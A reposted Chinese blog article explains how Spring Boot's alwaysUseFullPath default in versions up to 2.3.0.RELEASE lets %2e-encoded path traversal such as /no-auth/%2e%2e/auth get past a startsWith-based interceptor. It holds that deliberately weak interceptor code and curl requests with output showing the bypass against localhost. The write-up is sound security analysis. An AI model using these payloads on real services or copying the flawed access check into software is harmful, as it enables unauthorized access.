SpringBoot 的小Trick,你又不知道!
搜云库技术团队 文章源自JAVA秀-https://www.javaxiu.com/28777.html
大家好,我是磊哥。文章源自JAVA秀-https://www.javaxiu.com/28777.html
文章源自JAVA秀-https://www.javaxiu.com/28777.html
分享一个Spring Boot中关于%2e的小Trick。先说结论,当Spring Boot版本在小于等于2.3.0.RELEASE的情况下, alwaysUseFullPath
为默认值false,这会使得其获取ServletPath,所以在路由匹配时相当于会进行路径标准化包括对 %2e
解码以及处理跨目录,这可能导致身份验证绕过。而反过来由于高版本将 alwaysUseFullPath
自动配置成了true从而开启全路径,又可能导致一些安全问题。这里我们来通过一个例子看一下这个Trick,并分析它的原因。首先我们先来设置Sprin Boot版本文章源自JAVA秀-https://www.javaxiu.com/28777.html
注 意文章源自JAVA秀-https://www.javaxiu.com/28777.html
文末有:3625页互联网大厂面试题 文章源自JAVA秀-https://www.javaxiu.com/28777.html
<parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.3.0.RELEASE</version> <relativePath/> <!-- lookup parent from repository --></parent>
编写一个Controller文章源自JAVA秀-https://www.javaxiu.com/28777.html
@RestControllerpublic class httpbinController { @RequestMapping(value = "no-auth", method = RequestMethod.GET) public String noAuth() { return "no-auth"; } @RequestMapping(value = "auth", method = RequestMethod.GET) public String auth() { return "auth"; }}
接下来配置对应的Interceptor来实现对除no-auth以外的路由的拦截文章源自JAVA秀-https://www.javaxiu.com/28777.html
@Configurationpublic class WebMvcConfig implements WebMvcConfigurer { @Override public void addInterceptors(InterceptorRegistry registry) { registry.addInterceptor(handlerInterceptor()) //配置拦截规则 .addPathPatterns("/**"); } @Bean public HandlerInterceptor handlerInterceptor() { return new PermissionInterceptor(); }} @Componentpublic class PermissionInterceptor implements HandlerInterceptor { @Override public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception { String uri = request.getRequestURI(); uri = uri.replaceAll("//", "/"); System.out.println("RequestURI: "+uri); if (uri.contains("..") || uri.contains("./") ) { return false; } if (uri.startsWith("/no-auth")){ return true; } return false; }}
由上面代码可以知道它使用了getRequestURI来进行路由判断。通常你可以看到如 startsWith
, contains
这样的判断方式,显然这是不安全的,我们绕过方式由很多比如 ..
或 ..;
等,但其实在用 startsWith
来判断白名单时构造都离不开跨目录的符号 ..
那么像上述代码这种情况又如何来绕过呢?答案就是 %2e
发起请求如下文章源自JAVA秀-https://www.javaxiu.com/28777.html
$ curl -v "http://127.0.0.1:8080/no-auth/%2e%2e/auth"* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /no-auth/%2e%2e/auth HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 200< Content-Type: text/plain;charset=UTF-8< Content-Length: 4< Date: Wed, 14 Apr 2021 13:22:03 GMT<* Connection #0 to host 127.0.0.1 left intactauth* Closing connection 0
RequestURI输出为文章源自JAVA秀-https://www.javaxiu.com/28777.html
RequestURI: /no-auth/%2e%2e/auth
可以看到我们通过 %2e%2e
绕过了PermissionInterceptor的判断,同时匹配路由成功,很显然应用在进行路由匹配时会进行路径标准化包括对 %2e
解码以及处理跨目录即如果存在 /../
则返回上一级目录。我们再来切换Spring Boot版本再来看下文章源自JAVA秀-https://www.javaxiu.com/28777.html
<version>2.3.1.RELEASE</version>
发起请求,当然也是过了拦截,但没有匹配路由成功,返回404文章源自JAVA秀-https://www.javaxiu.com/28777.html
$ curl -v "http://127.0.0.1:8080/no-auth/%2e%2e/auth"* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /no-auth/%2e%2e/auth HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 404< Vary: Origin< Vary: Access-Control-Request-Method< Vary: Access-Control-Request-Headers< Content-Length: 0< Date: Wed, 14 Apr 2021 13:17:26 GMT<* Connection #0 to host 127.0.0.1 left intact* Closing connection 0
RequestURI输出为文章源自JAVA秀-https://www.javaxiu.com/28777.html
RequestURI: /no-auth/%2e%2e/auth
可以得出结论当Spring Boot版本在小于等于2.3.0.RELEASE的情况下,其在路由匹配时会进行路径标准化包括对 %2e
解码以及处理跨目录,这可能导致身份验证绕过。那么又为什么会这样?在SpringMVC进行路由匹配时会从DispatcherServlet开始,然后到HandlerMapping中去获取Handler,在这个时候就会进行对应path的匹配。我们来跟进代码看这个关键的地方 org.springframework.web.util.UrlPathHelper#getLookupPathForRequest(javax.servlet.http.HttpServletRequest)
这里就出现有趣的现象,在2.3.0.RELEASE中 alwaysUseFullPath
为默认值false文章源自JAVA秀-https://www.javaxiu.com/28777.html
文章源自JAVA秀-https://www.javaxiu.com/28777.html
68_1.png文章源自JAVA秀-https://www.javaxiu.com/28777.html
而在2.3.1.RELEASE中 alwaysUseFullPath
被设置成了true文章源自JAVA秀-https://www.javaxiu.com/28777.html
文章源自JAVA秀-https://www.javaxiu.com/28777.html
68_2.png文章源自JAVA秀-https://www.javaxiu.com/28777.html
$ curl -v http://127.0.0.1:8080/admin/%2e* Trying 127.0.0.1...* TCP_NODELAY set* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)> GET /admin/%2e HTTP/1.1> Host: 127.0.0.1:8080> User-Agent: curl/7.64.1> Accept: */*>< HTTP/1.1 200< Content-Type: text/plain;charset=UTF-8< Content-Length: 10< Date: Wed, 14 Apr 2021 13:48:33 GMT<* Connection #0 to host 127.0.0.1 left intactadmin page* Closing connection 0
文章源自JAVA秀-https://www.javaxiu.com/28777.html
在spring-boot-autoconfigure-2.3.1.RELEASE中文章源自JAVA秀-https://www.javaxiu.com/28777.html
文章源自JAVA秀-https://www.javaxiu.com/28777.html
为什么要这样设置?我们查看git log这里给出了答案。文章源自JAVA秀-https://www.javaxiu.com/28777.html
文章源自JAVA秀-https://www.javaxiu.com/28777.html
https://github.com/spring-projects/spring-boot/commit/a12a3054c9c5dded034ee72faac20e578b5503af文章源自JAVA秀-https://www.javaxiu.com/28777.html
当Servlet映射为”/”时,官方认为这样配置是更有效率的,因为需要请求路径的处理较少。配置servlet.path可以通过如下,但通常不会这样配置除非有特殊需求。文章源自JAVA秀-https://www.javaxiu.com/28777.html
spring.mvc.servlet.path=/test/
所以最后,当Spring Boot版本在小于等于2.3.0.RELEASE的情况下, alwaysUseFullPath
为默认值false,这会使得其获取ServletPath,所以在路由匹配时相当于会进行路径标准化包括对 %2e
解码以及处理跨目录,这可能导致身份验证绕过。而高版本为了提高效率对 alwaysUseFullPath
自动配置成了true从而开启全路径,这又造就了Shiro的CVE-2020-17523中在配置不当情况下的一个利用姿势,如果代码中没有提供对此类参数的判断支持,那么就可能会存在安全隐患。其根本原因是Spring Boot自动配置的内容发生了变化。文章源自JAVA秀-https://www.javaxiu.com/28777.html
来源 | http://rui0.cn/archives/1643文章源自JAVA秀-https://www.javaxiu.com/28777.html
近期技术热文文章源自JAVA秀-https://www.javaxiu.com/28777.html
1、请别再纠结,线程池大小 + 线程数量了2、牛逼哄哄的 BitMap,到底牛逼在哪?3、MySQL 8.0 的 5 个新特性,太实用了4、ZK、Eureka、Consul 、Nacos,注册中心怎么选?文章源自JAVA秀-https://www.javaxiu.com/28777.html
第3版:互联网大厂面试题文章源自JAVA秀-https://www.javaxiu.com/28777.html
包括 Java 集合、JVM、多线程、并发编程、设计模式、算法调优、Spring全家桶、Java、MyBatis、ZooKeeper、Dubbo、Elasticsearch、Memcached、MongoDB、Redis、MySQL、RabbitMQ、Kafka、Linux、Netty、Tomcat、Python、HTML、CSS、Vue、React、JavaScript、Android 大数据、阿里巴巴等大厂面试题等、等技术栈!文章源自JAVA秀-https://www.javaxiu.com/28777.html
阅读原文: 高清 7701页大厂面试题 PDF文章源自JAVA秀-https://www.javaxiu.com/28777.html
阅读原文文章源自JAVA秀-https://www.javaxiu.com/28777.html

评论